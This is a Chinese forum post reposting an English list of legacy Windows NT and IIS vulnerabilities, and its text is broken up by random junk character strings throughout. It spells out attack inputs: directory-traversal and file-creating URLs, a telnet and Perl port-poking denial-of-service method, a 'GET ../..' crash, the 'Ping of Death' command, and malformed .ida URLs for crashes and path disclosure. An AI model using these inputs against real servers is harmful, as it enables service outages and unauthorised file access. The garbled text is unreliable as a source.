天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0/ o$ S1 y* [* G" T1 I" @# ^9 }
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      ) S1 R- p! C# y$ \$ k( H
      / o' {* `" @8 @  C7 OA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      & V! ^$ Y& ~4 |! V9 A7 }9 @
      5 H8 \/ l4 ?' I7 W& {; x8 p: ABy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.. D8 Z  ?! e4 o1 P0 v  E! R

      8 d! K7 Y; @2 v8 U--------------------------------------------------------------------
      * s; ?  b  n$ U  x$ P- q  W. [" e! a% p0 ~
      受影響系統(tǒng):4.0
      - h$ X& N7 u, J/ r6 C. h& gA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      6 v+ }- s# n' J. }3 A/ X+ m7 s- e% H8 Y! Y
      If the file 'target.bat' exists, the file will be truncated.
      ; D" k0 }, l  i) a% \
      ) q+ {8 I# k& l
      * J! D& x8 N; N- c3 b( ?A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.) c( W* u* V# r+ n+ w
      ) c3 B$ l% X( h/ {
      ----------------------------------------------------------------------
      2 w, z2 U: m5 T# O) B1 s, ]
      + b  C  t0 u+ `受影響系統(tǒng):3.51,4.0
      9 O6 F8 r# g2 T! l0 j9 \Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      : Q4 B/ Z+ ~3 m2 N/ y( ?# n5 H; j4 _5 Q4 D7 ?- i* ?
      The following steps;
      1 Q9 R1 t5 Y3 A. y# m
      ( Y* F+ y, f7 s/ eTelnet to an NT 4.0 system on port 135
      # Q3 s- ]5 V$ o9 U3 N! ]Type about 10 characters followed by a <CR>
      ! z: D8 K* k' X' A' C  BExit Telnet
      ! m9 K6 l6 [0 {& c; h" mresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      - D' c/ n1 s# z* j( a
        h; \6 U9 E9 x9 yWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.) v& f" @( g+ Y: T5 c4 ]
      % _( n; x1 k. s3 C( C1 ]" o
      The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.$ j6 x. B  y8 ^% F; @. \
      2 P1 F( Q0 z) H4 P2 f4 |4 ~
      If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
      . v4 ?$ f6 Q' k7 S5 l, {! s! n5 P, R, A/ q8 V
      The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):) f* t1 q3 Q7 {+ |; H, ?8 V
      1 R8 ^) O' A8 U4 _7 F" \
      /*begin poke code*/  [8 V/ `9 R$ C
      6 A4 R8 T& l- O
      use Socket;
      ! p5 W' N! o- q9 a# J  h6 ause FileHandle;
      9 u% v2 S4 Y. r- `; o# K' h* F5 S7 erequire "chat2.pl";; }0 G6 X9 M- E/ G' F: s, M
      # i2 o4 u/ p/ u: M" c8 x/ S5 B" G
      $systemname = $ARGV[0] && shift;0 n7 |6 |6 L6 F; j
      : e1 E6 h- z& @( R) s
      $verbose = 1; # tell me what you're hitting2 f  x. I8 ?  Y2 c! S7 s
      $knownports = 1; # don't hit known problem ports  K! j: @9 z  j, i; p9 y9 s' s
      for ($port = $0; $port<65535; $port++)
      . w% q9 Y4 Q& S) `% V/ U{6 B6 M/ u/ `3 q8 _

      9 _4 B9 w' m- A  Q# L( j( d$ ?8 I7 K1 f7 W1 @* P8 T, g
      if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
        @5 I( }0 ?) v8 D* H+ d* ?4 G' @3 vnext;
      / C# J5 o( ?! _" c$ T$ |0 p}
      * V; c" d# M) O- S" y0 |$fh = chat::open_port($systemname, $port);
      4 l- e* M0 k; y1 T5 @' Ochat::print ($fh,"This is about ten characters or more");
      3 a7 B9 K: e3 E- Bif ($verbose) {
      9 o2 j0 _* S. s8 L) n3 H3 G' b5 hprint "Trying port: $port\n";
      1 n. k' E1 v0 E0 ^8 Y" m}
      0 k1 P# F/ k( H+ w9 _! w3 o$ pchat::close($fh);
      3 m' i" p$ ?8 ^! G2 J. m. n  Q' o5 P! s+ H
      }  n/ [+ t$ r( n( l: k( s# W0 p

      8 u4 |& L% n! y- o- ]/ D6 \% L8 D
      & B9 \- X' u, r" K+ F/ v4 r) ?/*end poke code*/
      ' J6 \4 y. t6 _( Q3 \* J
      + H. \9 u- O/ s0 U% V, h7 @Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
      ( \2 }! y# `' }* ~0 o8 p: m+ k
      --------------------------------------------------------------------------------0 M5 y; z: e$ q4 X
      ( e0 J, W3 [6 ?# Y2 o
      受影響系統(tǒng):4.0
      % E0 Q. B, \5 b7 hUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.$ X" J+ |+ B4 t( }

      2 Z- G6 J3 t$ O4 z: Y% XThis attack causes Dr. Watson to display an alert window and to log an error: " f* m, s" ]- c) d' L; K
      9 |& M' r" T8 d, I
      "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      5 T; q7 ?9 S* ^: h9 ?
      6 v- m; i7 P. e/ F& ?5 H1 B--------------------------------------------------------------------------------
      4 G/ R, m  J  Z. v
      ! j4 x" k' \7 ~# U8 X受影響系統(tǒng):3.51,4.0* B) Q8 |; g# U4 T: J% ]
      Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:9 i3 X8 [( Y7 H+ E& f

      6 m- h# {# O& N. TSTOP: 0X0000001E% _: _0 f, V6 U7 y
      KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS" k; G" E8 s' I& v8 ^+ a
        ?: @: r0 l! c& p) h4 F8 l  u- p
      -OR-
      " M# U# k8 @+ |2 ^: C
      : m4 k3 l& M& q& r* ^, U' tSTOP: 0x0000000A" G4 w( m0 z; X1 r2 n9 a
      IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS- T: O8 ^  d, U. o2 L" H

      ) {& |( B: X- l# oNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
        [1 U# E4 P0 d5 }$ _- a8 s5 y6 K* e
      , C/ Q9 h, t3 g4 U9 H1 \--------------------------------------------------------------------------------
      - I, C' X# [; N6 l" d& ~6 D% E% a3 `* J1 A) `: z! [5 G' c
      Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
      , Q7 f1 [# w7 Z% H9 I
      6 O* I0 K: q7 }3 R3 d; d2 i--------------------------------------------------------
      % y1 E* |+ E5 Y/ f9 ?! {- P# K1 X. _% r$ q7 B7 m1 R
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

      GMT+8, 2025-6-28 02:20

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表